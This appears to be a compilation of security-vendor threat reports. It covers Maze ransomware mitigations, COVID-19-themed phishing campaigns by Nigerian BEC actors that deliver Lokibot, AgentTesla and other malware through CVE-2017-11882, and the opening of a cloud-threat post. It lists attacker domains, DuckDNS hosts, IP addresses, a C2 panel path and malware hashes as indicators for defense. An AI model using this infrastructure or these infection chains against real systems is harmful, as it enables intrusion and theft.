d5bb3fafb5a1ccefa682282bb3f8adb015e3296688efe0d8aeb236828af9a331

d706fe8a74682bcd7eaf301b2cd1c0f38d54ed2b10570ea463bcaad341e010fb

d7696c137969dfd65a0398ddfd5065e5de1a61be93a4680ffc1c7faa731d5b69

d88cf127211cc77685a6f61e32a19358946e1a935930ba8c020d9807a2effe21

de3e93acc847979c41267c52cc4b46b35553a4a152feeab182b6c5dbfb21a14a

df2becbce21a204e7f92467a06e6d68069330b8c21dd7342adf079b68fb9d08f

e0bd1875f37bdffcea0a0e3871220a83ffdd09ffd3b7cb770520bbf00fd7e5b8

e1238fc834747073182c964f3da49c9c6dd963acaff053c8765a6871cb740de0

e17a5ba4e146550c43766f0a76004e548c1b9e4802370d5ee3f4c54a92404b64

e9259b9278b0e081ed8f64a2fb21f82f2c33a184db39650804d53916417fac2b

eb720c30a1bfd1771925c100403833a46cc0852987f57d83168a1adcf91dc371

ec1c7bec6d8d360f9f2be44fa948f08d3144f2b7a7c6432f13ad255f00c7c9b3

ec94ac63d4d436d94d73f76a3fb6200d1597d0203a17020f55a62b381071d849

ed83615ed3193bdcb4202b5e288199d626de7884c4eeda32968a06b3c0e43ee6

ef72febd8cbe7f5d73140436e2c19a76fb4546bff6265f3d259f51171b190afa

f1b696ca941f48be904350de5727970ba05ec7443df05b89bd416ac11866a4fe

f3e1fdf3ff164f8d75486e53ce23df56c7eaa0bc8261b2106c5a1ef32eead295

f4fe33c22dbe4182406054e7bb4a3cd764a75c277c8013d4decbf30b3c9dfad8

f50686ddf8d9696bce0cde277261a7e901ec4ad3af1f57c71c3f24b1bc3fdb58

f610bfaa9d6ed6c0bddd277590e19ff6100269392fda0812ee389f5c33df2811

f70f447eb7cbc612f06537775c0084c9cde94eeb7d39e3f84e1111f8eb108426

f8132b19cba0af3c24f873a5d81ee588b3487b8db9bb12f1b317f6b1d2affcaa

fe9b7fce26d17f9e46c69a6d11e69e974f54a9aca56ef945489deae8b51199d2

fef116e4e2eaa3ef8350dfddb1f4bfd73a19738c693e647c34cbd877d9a0dcf2

 

Threat Brief: Maze Ransomware

Posted on by Brittany Barbehenn

Executive Summary

Since the beginning of the calendar year, Palo Alto Networks has detected an uptick in Maze ransomware samples across multiple industries. As a result, we've created this general threat assessment post on the Maze ransomware activities and full visualization of these techniques can be viewed in the Unit 42 Playbook Viewer.

Maze ransomware, a variant of ChaCha ransomware, was first observed in May 2019 and has targeted organizations in North America, South America, Europe, Asia, and Australia. This ransomware is typically distributed via emails containing weaponized Word or Excel attachments. However, it has also been distributed via exploit kits such as the Spelevo Exploit Kit, which has been used with Flash Player vulnerabilities CVE-2018-15982 and CVE-2018-4878. Maze ransomware has also utilized exploits CVE-2019-11510 (Pulse VPN), as well as CVE-2018-8174 (Internet Explorer) to get into a network. The malware first establishes a foothold within the environment. It then obtains elevated privileges, conducts lateral movement, and begins file encryption across all drives. However, before encrypting the data, these operators may exfiltrate the files to be used for further coercion, including public exposure. Without the proper protections in place, a Maze ransomware infection will cripple normal business operations, and sensitive information will be compromised, resulting in a monetary loss.

Maze has not only been observed globally, but also affecting varying industries, which include: finance, technology, telecommunications, healthcare, government, construction, hospitality, media and communications, utilities and energy, pharma and life sciences, education, insurance, wholesale, and legal. On March 26, 2020, McAfee published a report providing a detailed overview of the Maze ransomware.

Palo Alto Networks Cortex XDR contains an Anti-Ransomware Protection module, which targets encryption-based activities associated with ransomware. Customers can also review activity associated with this Threat Brief via AutoFocus.

Impact Assessment

Several adversarial techniques were observed in this activity.

The following measures are suggested within Palo Alto Networks products and services for Maze ransomware:

Tactic Technique (Mitre ATT&CK ID) Product/Service Course of Action
Initial Access External Remote Services
(T1133)		 NGFW Configure Interfaces and Zone segmentation
Threat Prevention Deploy Vulnerability Protection Profile  for all low and high severity threats with block action
Cortex XDR Configure Host Firewall Profile
Initial Access Spear-Phishing Attachment (T1193) NGFW Configure a File Blocking Profile 
Threat Prevention Enable Anti-Virus profile with reset-both action
WildFire Forward files for WildFire Analysis
Cortex XDR Configure Malware Security Profile 
Initial Access Drive-by Compromise
(T1189)		 NGFW Block all unknown and unauthorized applications
Threat Prevention Deploy Vulnerability Protection Profile for all low and high severity threats with block action
DNS Security Enable DNS Security in Anti-Spyware profile
URL Filtering Control web access based on URL Category
WildFire Forward Files for WildFire Analysis
Initial Access Trusted Relationship (T1199) NGFW Configure Interfaces and Zones segmentation
Initial Access
Privilege Escalation
Persistence
Defense Evasion		 Valid Accounts (T1078) NGFW Configure Multi-Factor Authentication
Threat Prevention Enable Credential Phishing protection
Cortex XSOAR Deploy Cortex XSOAR Playbook - Access Investigation
Execution Defense Evasion Scripting
(T1064)		 WildFire Forward Files for WildFire Analysis
Cortex XDR Enable Anti-Exploit and Anti-Malware Protection
Execution Powershell (T1086) Cortex XDR Enable Anti-Exploit and Anti-Malware Protection
Execution Command-Line Interface (T1059) Cortex XDR Enable Anti-Exploit and Anti-Malware Protection
Execution Service Execution (T1035) Cortex XDR Configure Behavioral Threat Protection under the Malware Security Profile
Persistence Modify Existing Service (T1031) Cortex XDR Configure Behavioral Threat Protection under the Malware Security Profile
Persistence Registry Run Keys / Startup Folder (T1060) Cortex XDR Configure Behavioral Threat Protection under the Malware Security Profile
Persistence New Service (T1050) Cortex XDR Configure Behavioral Threat Protection under the Malware Security Profile
Privilege Escalation Exploitation for Privilege Escalation (T1068) Cortex XDR Enable Anti-Exploit and Anti-Malware Protection
Defense Evasion NTFS File Attributes (T1096) NGFW Block all unknown and unauthorized applications
WildFire Forward files for WildFire Analysis
Cortex XDR Configure Behavioral Threat Protection under the Malware Security Profile
Defense Evasion Obfuscated Files or Information
(T1027)		 WildFire Forward files for WildFire Analysis
Cortex XDR Enable Anti-Exploit and Anti-Malware Protection
Defense Evasion Disabling Security Tools (T1089) Cortex XDR Configure Behavioral Threat Protection under the Malware Security Profile
Credential Access Brute Force
(T1110)		 NGFW Create a rule to modify the default action for all signatures in the brute force category to block-ip address action
Credential Access Credential Dumping (T1003) Cortex XDR Cortex XDR monitors for behavioral events and files associated with credential access and exfiltration
Lateral Movement Remote Desktop Protocol (T1076) NGFW Configure Multi Factor Authentication,Create User Group for Limited Access to Allow List Applications,Configure Interfaces and Zones segmentation
Cortex XDR Configure Host Firewall Profile
Collection Data from Local System (T1005) Cortex XDR Cortex XDR monitors for behavioral events and files associated with collection activities
Command and Control Standard Application Layer Protocol
(T1071)		 NGFW Block all unknown and unauthorized applications
DNS Security Deploy Anti-Spyware profiles with block action
Cortex XDR Cortex XDR monitors for behavioral events indicative of command and control activity
Command and Control  Remote File Copy (T1105) NGFW Block all unknown and unauthorized applications
WildFire Forward files for WildFire Analysis
Cortex XDR Cortex XDR monitors for behavioral events associated with file creation, staging, and exfiltration
Command and Control Standard Cryptographic Protocol (T1032) NGFW Block all unknown and unauthorized applications, Enable SSL decryption
DNS Security Enable DNS Security in Anti-Spyware profile
WildFire Forward SSL decrypted files to WildFire
Discovery File and Directory Discovery (T1083) Cortex XDR Cortex XDR monitors for behavioral events along a causality chain to identify discovery behaviors
Discovery Network Share Discovery (T1135) Cortex XDR Cortex XDR monitors for behavioral events along a causality chain to identify discovery behaviors
Discovery Process Discovery (T1057) Cortex XDR Cortex XDR monitors for behavioral events along a causality chain to identify discovery behaviors
Discovery Software Discovery (T1518) Cortex XDR Cortex XDR monitors for behavioral events along a causality chain to identify discovery behaviors
Discovery System Information Discovery (T1082) Cortex XDR Cortex XDR monitors for behavioral events along a causality chain to identify discovery behaviors
Exfiltration Data Encrypted
(T1022)		 Cortex XDR Configure Behavioral Threat Protection under the Malware Security Profile
Exfiltration Exfiltration Over Alternative Protocol (T1048) NGFW

 

 Block all unknown and unauthorized applications.
profile
DNS Security Enable DNS Security in Anti-Spyware 
Exfiltration Exfiltration Over Command and Control (T1041) NGFW  Block all unknown and unauthorized applications
DNS Security Enable DNS Security in the Anti-Spyware profile
Threat Prevention Enable Anti-Spyware Profile with Block Action
Impact Data Encrypted for Impact (T1486) Cortex XSOAR Deploy Cortex XSOAR Playbook - Ransomware Manual for incident response

Table 1. Course of Action for Maze Ransomware
These capabilities are part of the NGFW security subscriptions service

Recently, malicious operators behind the Maze ransomware activities compromised multiple IT service providers. These operators were also able to establish a foothold within another victim’s network through insecure Remote Desktop Protocol and other remote service connections or by brute-forcing the local administrator account. Organizations should be mindful of potential compromises through third-party sources and ensure strong passwords are used for all systems capable of remote access.

It was also reported that Maze operators pay special attention to cloud backups on the compromised network. If the operators were to obtain login credentials, they are then able to download all backup data to an actor controlled server. Organizations should ensure that all cloud backup files are properly stored and protected.

Threat Education

What is Ransomware?

Ransomware is a criminal business model that uses malicious software to hold valuable files and other data for ransom. Victims of ransomware attacks may have their operations degraded or shut down entirely.

For additional details on a What is Ransomware?, visit the Palo Alto Networks Cyberpedia:
https://www.paloaltonetworks.com/cyberpedia/what-is-ransomware

Palo Alto Networks customers can review activity associated with this Threat Brief via AutoFocus using the following tag: Maze, SpelevoEKFlashContainer

Palo Alto Networks Cortex XDR contains an Anti-Ransomware Protection module. This module targets encryption-based activity associated with ransomware. Cortex XDR contains defined behavioral indicators of compromise designed to detect anomalies within your network.

More information on ransomware can be found in the 2021 Unit 42 Ransomware Threat Report.

References

https://download.bitdefender.com/resources/files/News/CaseStudies/study/318/Bitdefender-TRR-Whitepaper-Maze-creat4351-en-EN-GenericUse.pdf
https://www.docdroid.net/dUpPY5s/maze-pdf#page=2

The suggested courses of action in this report are based on the information currently available to Palo Alto Networks and the capabilities within Palo Alto Networks products and services.

SilverTerrier: New COVID-19 Themed Business Email Compromise Schemes

Posted on by Peter Renals

Executive Summary

Focusing on one of the most active subsets of the global threat landscape, Palo Alto Networks Unit 42 tracks Nigerian cyber criminals involved in Business Email Compromise (BEC) activities under the name SilverTerrier. Over the past 90 days (Jan. 30 - Apr. 30), we have observed three SilverTerrier actors/groups launch a series of 10 COVID-19 themed malware campaigns. These campaigns have produced over 170 phishing emails seen across our customer base. While broad in their targeting, these actors have exercised minimal restraint in terms of targeting organizations that are critical to COVID-19 response efforts. Specifically, we find it alarming that several of these campaigns recklessly included targets at government healthcare agencies, local and regional governments, large universities with medical programs/centers, regional utilities, medical publishing firms, and insurance companies across the United States, Australia, Canada, Italy, and the United Kingdom.

According to the recently released annual report from the Internet Crime Complaint Center (IC3), the Federal Bureau of Investigation (FBI) observed a record 23,775 BEC attacks in 2019. Significantly greater than all other categories of cybercrime over the same period, these attacks resulted in an estimated US$1.77 billion in global losses.

With the global impacts of COVID-19, an unprecedented number of corporations are expediating their cloud infrastructure migrations, all while transitioning to a largely remote workforce that is understandably interested in all topics related to the virus. Given this trend, it should come as no surprise that BEC actors are seizing opportunities to exploit the situation through tailored phishing campaigns related to COVID-19.

None of the malicious campaigns mentioned in this blog were successful in infecting their intended targets. Palo Alto Networks security service offerings (URL Filtering, WildFire, and Threat Prevention) detect and classify all samples and associated infrastructure as malicious.

Actor 1

We identified the most pronounced activity as a series of eight campaigns that are either directly related, or within one to two degrees of separation, from a SilverTerrier actor that is well-known across the cybersecurity community. For the purposes of this blog, we will refer to this individual as Actor 1.

Campaign 1

The first campaign was launched on January 30, 2020 with variations of the email subject sent in both English and Indonesian. Attached to the email was a sample of Lokibot malware disguised as an Indonesian health department document. Upon infecting a victim, the malware was designed to call out to petroindonesia[.]co[.]id.

Table 1. Indicators from the first campaign
Campaign 2

A little more than a month later, we observed a single email sent to a major utility provider in the United States. This message was crafted to appear as if it were an email that had been forwarded from the “UN,” presumed to be the United Nations. Attached to the email was a Microsoft Excel spreadsheet containing text written in the Afrikaans language (Figure 1). Upon opening, the file leverages the CVE 2017-11882 vulnerability to call out and download an executable called “dutchz.exe” from the domain uzoclouds[.]eu and subsequently attempts to connect to via SMTP to mailhostbox[.]com. Although Microsoft has released security updates for this vulnerability, it remains in common use amongst cyber criminals. In attributing this activity, the domain uzoclouds[.]eu stands out as being directly associated with Actor 1, and the Excel file itself was last edited by modexcomm which is a known alias for this actor.

Figure 1. Content and translation of UPDATE!!!.xlsx
Table 2. Indicators from the second campaign
Campaign 3

On March 23, 2020 a third campaign was discovered with several phishing emails sent to an Australian health insurance provider. This time the subject and attachment were scoped to portray an order form for new face masks. Similar to the previous campaign, the attached RTF document leveraged the CVE 2017-11882 vulnerability to call out to both posqit[.]net and bit[.]ly, thus taking advantage of a URL shortening service to obscure one of the connections. Per the research and analysis blog by Cyren, this sample downloads and installs AgentTesla malware.

Table 3. Indicators from the third campaign
Campaign 4

Beginning the next day (March 24) and continuing through April 7, 2020, a fourth, more complex, campaign was observed. This time, three different email accounts were used to send three different malicious attachments. Common amongst all of these phishing attempts was the same email subject relating to COVID-19 supplies. Noting that email subjects are not typically used as a basis for establishing correlation between phishing campaigns, we believe that in this case the uniqueness of the subject (to include identical capitalization and punctuation), combined with similar attachment names and malware families provides a sufficient pattern to suggest that these three events are related.

The first emails were sent to several recipients, including a university in the United States with a large medical program. Consistent with previous campaigns, the attachment was a Microsoft Office document that leveraged the CVE 2017-11882 vulnerability. More specifically, it was a protected Excel file with the blurred heading “Galaxy International Trading Limited” that upon being opened, called out to both mecharnise[.]ir and metadefenderinternationalsolutionfor[.]duckdns[.]org to download additional executables on victim machines.

COVID-19 BEC Malware Example
Figure 2. Campaign 4 Email Targeting US University - Sample Products.xlsx

Next, we saw a single phishing email sent to a Canadian health agency. Setting itself apart from previous samples, this attachment was in fact a sample of AgentTesla packaged as “Product_Sample_List.exe” inside a compressed RAR file. After infecting a potential victim, this file was configured to use SMTP for its command and control with coffiices[.]com.

Finally, the third set of emails were sent to several recipients, including an Australian energy company. Consistent with the previous email, this set once again included a sample of AgentTesla packaged as “Sample Product.exe” inside a compressed RAR file. Additionally, similar to the second campaign, this sample was configured to connect to an account at mailhostbox[.]com for command and control.

Table 4. Indicators from the fourth campaign
Linking Campaigns 1-4

In examining the connection between Actor 1, Nigerian cybercrime, and these first four phishing campaigns, we found that when malware linkages from these campaigns and historical BEC activity were overlaid with insights afforded by a weakness in Lokibot malware (Malbeacon data), several interesting connections emerged (Figure 2). While not definitive in attributing all of this activity to Actor 1, these connections chart a path originating with Actor 1’s infrastructure, through the infrastructure for these new COVID-19 campaigns, and back to Nigeria.

At the top of our analysis, we start with four European Union (.eu) domains that are directly attributed to Actor 1’s previously identified BEC activity. Solid lines connecting the domains and IP addresses are based on insights provided by the actor’s employment of Lokibot malware, while dashed lines represent the existence of malware samples that connect to both domains. Following the link to hojokk[.]com, we discovered malware hosted in a folder called “MMC.” While we lack insight into Actor 1’s middle name, his first and last initial are coincidently “MC.” Moreover, following additional connections to and from this domain, we discovered several links to Nigeria, as well as malware overlap with posqit[.]net, which we will discuss further in a subsequent campaign below.

Focusing on mecharnise[.]ir, we found malware overlaps with two of Actor 1’s domains. Moreover, we discovered shared Lokibot malware connections to two specific Nigerian IP addresses that both overlap with petroindonesia[.]co[.]id.

Figure 3: Infrastructure connections for campaigns 1-4
Campaign 5

Using these connections as a starting point, we then began our analysis of campaign five, which began on March 26, 2020. Similar to the previous campaign, we noted multiple malware samples and sending accounts, to include spoofing a clinical research organization in the United States.

The first email was seen by a single customer and was packaged once again as a purchase order form for COVID-19-related products. An Excel document was attached and configured to exploit the CVE 2017-11882 vulnerability in order to download and run an executable file mapped to systemserverrootmapforfiletrn[.]duckdns[.]org. Similar to previous campaigns, the downloaded file then connected over SMTP to an account at mailhostbox[.]com. Additionally, it’s worth noting that the Excel attachment was seen in a separate BEC style campaign the same day (see Figures 4. and 5.) and that the document also contained the blurred title of “Galaxy International Trading Limited,” consistent with the fourth campaign. Since the exact same file was sent in multiple phishing campaigns using different themes on the same day, we can assert with greater confidence that these attacks are connected.

Figure 4. Separate BEC Campaign with the Same Attachment
COVID-19 Malware Sample
Figure 5. Campaign 5 Sample Sent from Spoofed US Clinical Research Org. - PO For-COVID-19 ProductS.xlsx

On March 29, 2020, a second phishing email was sent to a government agency in the United States with the same subject and filename. However, this time the attachment was AgentTesla malware packaged as an executable file that, once again, connected to an account at mailhostbox[.]com for command and control. Furthermore, this email was sent from the domain reynoldsgh[.]com which maintains an active website that appears incomplete and is potentially fraudulent, with a Ghana phone number listed under contact information.

COVID-19 BEC Phishing Sample
Figure 6. Screenshot of reynoldsgh[.]com
The third series of emails arrived on April 6, 2020. Sent to a medical publishing company in Europe and a government agency in the United States, this email also included a sample of AgentTelsa malware configured to use SMTP for communication with an account at mailhostbox[.]com.

Indicators of BEC COVID-19 Campaigns
Table 5. Indicators from the fifth campaign
Campaign 6

Following an emerging trend of using Dynamic DNS services offered by DuckDNS, on March 30, 2020 we identified a single phishing email disguised as a vessel delay letter from a potentially spoofed shipping company in Singapore. A Word document was attached to the email with a CVE 2017-11882 exploit that called out to kungfrdyeducationalinvestment8agender[.]duckdns[.]org to download another document, and an executable file assessed to be Formbook malware, based on a report by Infoblox.

Table 6. Indicators from the sixth campaign

Dynamic DNS Clusters

Deriving linkages from the connections used in campaigns four through six proved exceptionally challenging based on the function and anonymity afforded by dynamic DNS services. However, by pivoting through several layers of obfuscation, we identified three clusters of DuckDNS hosts with links to Nigeria. While difficult to attribute all of this activity directly to Actor 1, the malware overlap seen in the third campaign with mecharnise[.]ir , combined with malware packaging similarities (CVE-2017-11882) and a Nigerian nexus, all lead us to believe that this activity is likely related within one or two degrees of separation from Actor 1.

Starting with metadefenderinternationalsolutionfor[.]duckdns[.]org from the fourth campaign, we quickly found an initial cluster of five hosts that were all related based on an IP connection and their creation dates. Coincidently, this cluster included another host with a COVID-19-related name seen in the fifth campaign: systemserverrootmapforfiletrn[.]duckdns[.]org. Researching these hosts, we found several additional samples of malware packaged as Microsoft Word and Excel documents with the CVE-2017-11882 vulnerability and also found additional malware overlaps.

Table 7. Dynamic DNS Cluster 1

Further analysis of the IP address connection revealed a second cluster of hosts linked to an additional 71 samples of malware with traditional BEC themes.

Table 8: Dynamic DNS Cluster 2

Following the malware link between cluster 1 and 23[.]95[.]132[.]48, we discovered that this IP address provided command and control for over 200 samples of Lokibot malware. The vast majority of these samples were configured to call back to a dynamic DNS host in order to download an executable file, before calling out to the IP address for command and control. Pivoting from these samples, we identified a third cluster containing 48 hosts with consistent naming patterns. Interestingly, records show that many of these hosts were established within days of the second cluster, and while they point towards IP addresses in Vietnam, they were initially established using Nigerian infrastructure.

Table 9. Dynamic DNS Cluster 3

Reviewing the list of hosts in cluster three, the following naming conventions stand out: chnes, engine, kung, russchine, shgshg, and tesco. However, most notably cluster three includes kungfrdyeducationalinvestment8agender[.]duckdns[.]org which we observed in the sixth campaign above.

Figure 7. Infrastructure connections between campaigns
Campaign 7

A seventh campaign was launched spanning April 7th and 8th 2020, in which two samples of NanoCore RAT were packaged as compressed RAR files with a vaccine-related lure. These samples were sent to several organizations including a government health agency and two universities with medical programs in the United States, as well as a Canadian health insurer.

Table 10. Indicators from the seventh campaign

Connecting this campaign to Actor 1, we found malicious activity originating from the domain ladbible[.]com dating back to mid-January. Tracing the earliest activity back to Nigerian origins, we also discovered that less than two weeks prior to this campaign, this domain was used to distribute a sample of Lokibot malware. That sample called back to two domains previously attributed to Actor 1 (sylvaclouds[.]eu and hokokk[.]com) and outlined in Figure 3 above.

Campaign 8

On April 8, 2020, we witnessed the most recent campaign by this actor. Distributed broadly, targets of this campaign included a government health agency, state infrastructure, and a health insurance company in the United States, in addition to a university and regional government in Italy, and various government institutions in Australia. Disguised as COVID-19 relief materials coming from a “Thai Medical Department,” these phishing emails were delivered with one of two samples of Lokibot malware designed to call out to 185[.]126[.]202[.]111 for command and control. As seen in Figure 3 above, analysis performed on this IP address identified malware overlap with dynamic DNS clusters one and three.

Table 11. Indicators from the eighth campaign

Actor 2

Separate and distinct from the campaigns above, we identified a single campaign associated with the name of Alhaji. Between March 17th and 18th, 2020, two samples of Lokibot malware were sent to several organizations, including a government health agency in the United States. These samples called out academydea[.]com/alhaji/Panel/five/fre[.]php for command and control. Upon researching this domain, we discovered an additional 16 samples of malware used in the previous month. Further, leveraging insights from a vulnerability in Lokibot malware, we were able to trace this activity back to Nigerian IP addresses.

Indicators of BEC Phishing Campaigns
Table 12. Indicators from Actor 2’s campaign

Actor 3

Between March 23rd and 24th, 2020, a SilverTerrier actor using the name Black Emeka launched a series of emails containing malicious attachments. Disguised as COVID-19 information, these emails originated from the domain welheadcontrol[.]com, which is registered to the actor. The attached malware samples use PowerShell to download malicious executable files from the domain goldenlion[.]sg, which resolves to an active website for Golden Lion Technology PTE LTD in Singapore. While likely not a coincidence, the website advertises Goldhofer equipment, while this actor is also the registered owner of the typo variant domain goldhhofer[.]com.

Figure 8. Advertising for Goldhofer on goldlion[.]sg
Table 13. Indicators from Actor 2’s campaign

Conclusion

As 2020 progresses, the most prominent threat facing customers is commodity malware deployed in support of sophisticated BEC schemes. Given the global impacts of COVID-19, SilverTerrier actors have begun adapting their phishing campaigns and will likely continue to use COVID-19-themed emails to deliver commodity malware broadly in support of their objectives. In light of this trend, we encourage government agencies, healthcare and insurance organizations, public utilities, and universities with medical programs to apply extra scrutiny to COVID-19-related emails containing attachments. While organizations with appropriate spam filtering, proper system administration, and up-to-date Windows hosts have a much lower risk of infection, we further encourage administrators to validate installation of the Microsoft patch for CVE 2017-11882.

Additionally, Palo Alto Networks customers benefit from the following:

Cortex XDR protects endpoints from all malware, exploits and fileless attacks associated with SilverTerrier actors.
WildFire® cloud-based threat analysis service accurately identifies samples associated with these malware families.
Threat Prevention provides protection against the known client and server-side vulnerability exploits, malware, and command and control infrastructure used by these actors to include CVE 2017-11882
URL Filtering identifies all phishing and malware domains associated with these actors and proactively flags new infrastructure associated with these actors before it is weaponized.
Users of AutoFocus™ contextual threat intelligence service can view malware associated with these attacks using the SilverTerrier tag.

Indicators of Compromise

Malware Samples

3335ebffd8b4ab739db99f68cd6d79caa39c1210c274bbe4166194cc26de4123

e365100468e9472518d1875796932a8085ab29f6bbfe3357928fa9cc6187628b

27d601ef1a2b340b6b644493a627064f60ad8a95271248e00f7bb54a59abb069

563b1c6252612d06b714bf29b9f53f7aade4c7ac6658b2d0c774a7e244ea83da

0ae2aaeb2938cf4c777be4aa192e4994020609f5640add8e7296de9ff34eb227

4b8b49bdfa435d0faba2e3964b04e20bbfc86aa4ffc3c3b8e1449894892f125b

589a1900b210826e97ec8da3c5c40f707963146e934393eb15e1b07a1398912c

7f661c6f5ebba3eca82e1dbf1a96e27f2503da405093464538d90dc113a7b439

f7183d3a992ead2bf194ac46b1f6f70ad9e30bfd5b6065ffbd96a3529c311725

83457e2b8f9209ec1c987b1a0bee65140cc41d1d59ed38f1d1ad160ea0d1d13c

b58e386928543a807cb5ad69daca31bf5140d8311768a518a824139edde0176f

c5c43b340957830f5d7484ce06f9de0ef593d88f3d48c09cd2150e670661f672

f7b9219f81772e928ab0fbd0becbcf10ca3792ce211bb4a7fa68b41050bdb220

241f09feda09dc33b86e23d317bc2425f4d43b91221815caa5eb055a9a97be74

31d2ef10cad7d68a8627d7cbc8e85f1b118848cefc27f866fcd43b23f8b9cff3

7b2512d06723cc29f80ae8c8d6df141f27bc9d962ae76b5651b84d7be4379bba

aff38fe42c8bdafcd74702d6e9dfeb00fb50dba4193519cc6a152ae714b3b20c

8f56fb41ee706673c706985b70ad46f7563d9aee4ca50795d069ebf9dc55e365

da26ba1e13ce4702bd5154789ce1a699ba206c12021d9823380febd795f5b002

1ee6646e0ea9ceb6fa1721f809bd3cdaeb38c6b2bdd7171b340097c237527568

d731fb3fcc6ecd266251408a282ef4409eac94ce25cecadbfcb2df08e7ca7693

d80a440755dc15803db459b15b991d1abe81054f0942d054d965a578b92917b7

8037a8e12e8cacdaca24b993ffdbd8cdc63ec29dd78eee136083fa09049dbf0c

Domains:

academydea[.]com

coffiices[.]com

goldenlion[.]sg

ladbible[.]com

mecharnise[.]ir

mikeservers[.]eu

modcloudserver[.]eu

petroindonesia[.]co[.]id

posqit[.]net

reynoldsgh[.]com

sylvaclouds.eu

uzoclouds[.]eu

welheadcontrol[.]com

Dynamic DNS Hosts:

12kungwsdyducationaldeveloperinvestmenty[.]duckdns[.]org

6uniteddefenceforstdygorvermentsocialeme[.]duckdns[.]org

americanmicrosoftclouddepartment[.]duckdns[.]org

antipiracydetectorganisationforwsdy3film[.]duckdns[.]org

bbchenkotsdywoolandpappercompanybnhs5[.]duckdns[.]org

chinoex2onlineantibullyandgeneralxpstdy5[.]duckdns[.]org

chnes9wealthandstdyorganisationsumit[.]duckdns[.]org

chneswealstdy8thandorganisationjokbo[.]duckdns[.]org

chneswealthandorganisationstdy7joppl[.]duckdns[.]org

chneswsdy13wealthandmoduleorganisationrn[.]duckdns[.]org

chneswsdy8wealthandorganisationjokbo[.]duckdns[.]org

chnfrndsecurityandgorvermentstdy1socialf[.]duckdns[.]org

chnfrndsub1inteligentangencysndy4project[.]duckdns[.]org

chnfrndtsdysecurityandgorvermentsocialjf[.]duckdns[.]org

chnfrndwsdy1securityandgorvermentsocialf[.]duckdns[.]org

cloudfilesharingdomainurllinksys[.]duckdns[.]org

crimedetectivefor1stdygorvermentndsocial[.]duckdns[.]org

empowermentorganisationstday1government[.]duckdns[.]org

engin3worldstdydevelopmentandtechnology[.]duckdns[.]org

engintsdy3worlddevelopmentandtechnology[.]duckdns[.]org

fileexchangeserverprotocolsystemintergra[.]duckdns[.]org

filegotosecureothers[.]duckdns[.]org

frndgreen1frdycreamcostmeticsladiesshop[.]duckdns[.]org

frndgreen3creamwsdycostmeticsbabystored[.]duckdns[.]org

globaltransfersecurefilethroughcloud[.]duckdns[.]org

green9wsdyelectronicsandkitchenappliance[.]duckdns[.]org

investmenteducationkungykmtsdy8agender[.]duckdns[.]org

kung11ducationalstdydeveloperinvestmenty[.]duckdns[.]org

kung13eduationalstdydeveloperinvestmenty[.]duckdns[.]org

kungeducationalinvestment8tusdyagender[.]duckdns[.]org

kungfrdyeducationalinvestment8agender[.]duckdns[.]org

kungglobalinvestmenteductgpmstdy8addres[.]duckdns[.]org

kungglobalinvestmentjpjeductaddres5stdy[.]duckdns[.]org

kungglobalinvestmentjpjwsdy6eductaddres[.]duckdns[.]org

kungstdy7globalinvestmentjmpeductaddres[.]duckdns[.]org

kungwsdy7globalinvestmentjmpeductaddres[.]duckdns[.]org

livevideoremoteconference[.]duckdns[.]org

mastervisacloudesystemprtomicrosftwareus[.]duckdns[.]org

msofficeinternatiinalfilecloudtransfer[.]duckdns[.]org

msofficewordfiletransfertotheadmintrue[.]duckdns[.]org

office365securefilegatewaytransfer[.]duckdns[.]org

omentradinginternationalprivateltd[.]duckdns[.]org

prodigtsdy5organizationalcompanygroupin[.]duckdns[.]org

russchine2specialstdy1plumbingmaterialsv[.]duckdns[.]org

russchine2specialstdy2plumbingmaterialgh[.]duckdns[.]org

russchine2wsdy1specialplumbingmaterialsv[.]duckdns[.]org

russchine2wsdyspecial6plumbingjkmaterial[.]duckdns[.]org

shgshg13nationalwsdyobjindustrialatempt[.]duckdns[.]org

shgshg9nationalobjwsdyindustrialgoogler[.]duckdns[.]org

shgshgnationalindustrialwsdy8googleklm[.]duckdns[.]org

shgshgnationalobjindustrialstdy10atempt[.]duckdns[.]org

shgshgnstdy7ationalindustrialgoogleklm[.]duckdns[.]org

shgshgstdy9nationalobjindustrialgoogle[.]duckdns[.]org

silentexploitfileexchangerzeroday[.]duckdns[.]org

tescogroseryand1wsdayelectronicstorehome[.]duckdns[.]org

tescohomegroseryandelectronicstday2store[.]duckdns[.]org

tescostday1groseryandelectronicstorehome[.]duckdns[.]org

webxpostdytechnologyhardsoftware5buyers[.]duckdns[.]org

wewewewewesesesesasbacwederffggffddsss[.]duckdns[.]org

windowsdefenderwithfiewallprotocolsecure[.]duckdns[.]org

windowsfirewallprotcolsecuritysystem[.]duckdns[.]org

worldengindevelopnw7stdymenttechnology[.]duckdns[.]org

IP Addresses:

23[.]95[.]132[.]48

185[.]126[.]202[.]111

Palo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report with our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit www.cyberthreatalliance.org.

 

COVID-19: Cloud Threat Landscape

Posted on by Jay Chen

Executive Summary

Unit 42 researchers analyzed 1.2 million newly observed hostnames (NOH) containing keywords related to the COVID-19 pandemic from March 9, 2020 to April 26, 2020 (7 weeks). 86,600+ fully qualified domain names are classified as “high-risk” or “malicious” (C2, malware, or phishing), spread across various regions , as shown in Figure 1. The United States has the highest number of malicious domain names (29,007), followed by Italy (2,877), Germany (2,564), and Russia (2,456). 

Unit 42 researchers found 56,200+ of the NOHs are hosted in one of the top four popular cloud service providers (CSPs), such as Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), and Alibaba: 

    • 70.1% in AWS
    • 24.6% in GCP
    • 5.3% in Azure 
    • <.1% in Alibaba

During our research, we noticed that some malicious domains resolve to multiple IP addresses, and some IP addresses are associated with multiple domains. This many-to-many mapping often occurs in cloud environments due to the use of content delivery networks (CDNs) and can make IP-based firewalls ineffective. Some important findings in this research are:

    • On average, 1,767 high-risk or malicious COVID-19 themed domain names are created every day.
    • Of the 86,600+ domain names, 2,829 domain names hosted in public clouds are found as high-risk or malicious
      • 79.2% in AWS
      • 14.6% in GCP
      • 5.9% in Azure
      • .3% in Alibaba
    • Adversaries are disguising malicious activities such as phishing and malware delivery in the cloud.
    • The higher price and more rigorous screening/monitoring process is likely making malicious actors less willing to host malicious domain names in public clouds.

